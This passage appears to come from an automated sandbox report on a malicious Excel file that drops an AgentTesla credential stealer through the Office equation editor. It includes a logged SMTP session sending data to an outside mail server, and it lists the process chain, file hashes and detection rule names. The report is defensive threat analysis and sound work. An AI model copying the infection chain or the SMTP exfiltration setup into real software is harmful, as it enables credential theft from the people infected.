                                                                                                          Jan 27, 2021 09:17:22.944883108 CET58749167208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                          Jan 27, 2021 09:17:22.945167065 CET49167587192.168.2.22208.91.198.143MAIL FROM:<facturacion@migeulez.com>
                                                                                                          Jan 27, 2021 09:17:23.119394064 CET58749167208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                          Jan 27, 2021 09:17:23.119929075 CET49167587192.168.2.22208.91.198.143RCPT TO:<facturacion@migeulez.com>
                                                                                                          Jan 27, 2021 09:17:23.302701950 CET58749167208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                          Jan 27, 2021 09:17:23.303127050 CET49167587192.168.2.22208.91.198.143DATA
                                                                                                          Jan 27, 2021 09:17:23.476356030 CET58749167208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                          Jan 27, 2021 09:17:24.103679895 CET58749167208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 375861C2266

                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Start time:09:14:49
                                                                                                          Start date:27/01/2021
                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                          Imagebase:0x13feb0000
                                                                                                          File size:27641504 bytes
                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:09:15:09
                                                                                                          Start date:27/01/2021
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:09:15:12
                                                                                                          Start date:27/01/2021
                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                          Imagebase:0xc20000
                                                                                                          File size:1073152 bytes
                                                                                                          MD5 hash:411FA0337649AD03B57D223E60680397
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:09:15:13
                                                                                                          Start date:27/01/2021
                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                          Imagebase:0xc20000
                                                                                                          File size:1073152 bytes
                                                                                                          MD5 hash:411FA0337649AD03B57D223E60680397
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:low

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >